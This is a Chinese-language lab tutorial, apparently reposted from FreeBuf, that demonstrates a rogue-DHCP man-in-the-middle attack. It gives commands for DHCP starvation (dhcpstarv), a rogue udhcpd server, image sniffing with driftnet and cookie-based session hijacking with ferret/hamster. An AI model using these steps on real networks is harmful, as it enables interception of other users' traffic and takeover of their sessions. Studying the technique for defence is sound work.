流氓DHCP服务器内网攻击测试

安全 黑客攻防 网站安全
通常内网渗透都是基于ARP的攻击,但ARP攻击对内网的负担太重,很容易被发现。今天讲的是基于DHCP协议的攻击。

通常内网渗透都是基于ARP的攻击,但ARP攻击对内网的负担太重,很容易被发现。今天讲的是基于DHCP协议的攻击。

基于DHCP的攻击理解起来很简单,首先伪造Mac地址耗竭正常的DHCP服务器的IP地址,然后黑客用自己的主机伪造一个DHCP服务器,那么新连上内网的主机只能使用流氓DHCP服务器分配的IP,这样黑客的主机就变成了内网网关,可以借此控制内网中其他主机的网络流量。

攻击环境

操作系统:Kali linux

网关: 192.168.177.1

IP地址: 192.168.177.128

网段:192.168.177.1/24

流氓DHCP服务器内网攻击测试

 

0×01 开启操作系统的路由转发

echo "1" >/proc/sys/net/ipv4/ip_forward

流氓DHCP服务器内网攻击测试

0×02 攻击正常的dhcp服务器,耗光ip资源

dhcpstarv -i eth0 -e 192.168.177.128

流氓DHCP服务器内网攻击测试

Kali默认没有安装dhcpstarv,也可以用yersinia代替

0×03 安装dhcp服务器udhcpd

# apt-get install udhcpd

然后修改一下配置文件

# vim /etc/udhcpd.conf

流氓DHCP服务器内网攻击测试 

流氓DHCP服务器内网攻击测试

0×04 启动DHCP服务器

service udhcpd start

流氓DHCP服务器内网攻击测试

 

然后启动另一台Kali机当作目标靶机,由于正常的DHCP服务器已经没有可分配的IP资源,新的内网主机就会使用攻击者DHCP服务器分配的IP

0×05 抓取目标靶机的图片

在攻击主机上开启driftnet

# driftnet -i eth0

在目标靶机打开百度图片

[[145539]]

在攻击者的服务器上就可以看到图像

流氓DHCP服务器内网攻击测试

0×06 会话劫持

开启wireshark抓取流经本地网卡的数据包,由于其他的机器走的是攻击者主机的网卡,这也意味着wireshark可以抓取其他主机的数据包

流氓DHCP服务器内网攻击测试

用ferret解析一下

# ferret -r demo.pcap

流氓DHCP服务器内网攻击测试

 

会在本地生成一个名为hamster.txt的文件

流氓DHCP服务器内网攻击测试

然后运行harmter,这会在主机开启1234端口

流氓DHCP服务器内网攻击测试

配置一下火狐代理

流氓DHCP服务器内网攻击测试

劫持成功

流氓DHCP服务器内网攻击测试

 

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2017-01-17 16:09:25

2010-08-25 21:42:57

DHCP服务器

2010-09-25 15:04:07

LinuxDHCP服务器测试

2010-08-23 17:31:23

LinuxDHCP服务器

2010-09-03 12:19:18

DHCP服务器dhcp配置

2010-08-26 22:01:47

DHCP服务器

2010-08-31 17:37:22

DHCP服务器故障

2010-09-25 12:19:51

DHCP服务器

2010-08-25 14:40:49

DHCP服务器故障

2010-08-26 10:40:38

DHCP服务器

2010-09-02 15:09:56

DHCP服务器

2011-08-08 14:28:49

dhcp服务器

2010-08-29 20:53:03

DHCP服务器

2009-08-27 17:00:21

DHCP服务器

2010-08-26 16:16:17

DHCP服务器

2010-08-26 09:27:53

DHCP服务器

2010-11-22 09:38:31

DHCP服务内网

2010-08-05 13:56:06

路由器配置

2010-08-25 21:20:38

DHCP服务器

2010-09-02 14:56:03

建立DHCP服务器
点赞
收藏

51CTO技术栈公众号